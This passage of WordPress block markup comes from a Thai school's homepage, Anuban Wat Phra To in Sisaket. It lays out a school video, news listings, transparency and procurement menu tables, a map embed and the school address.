kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 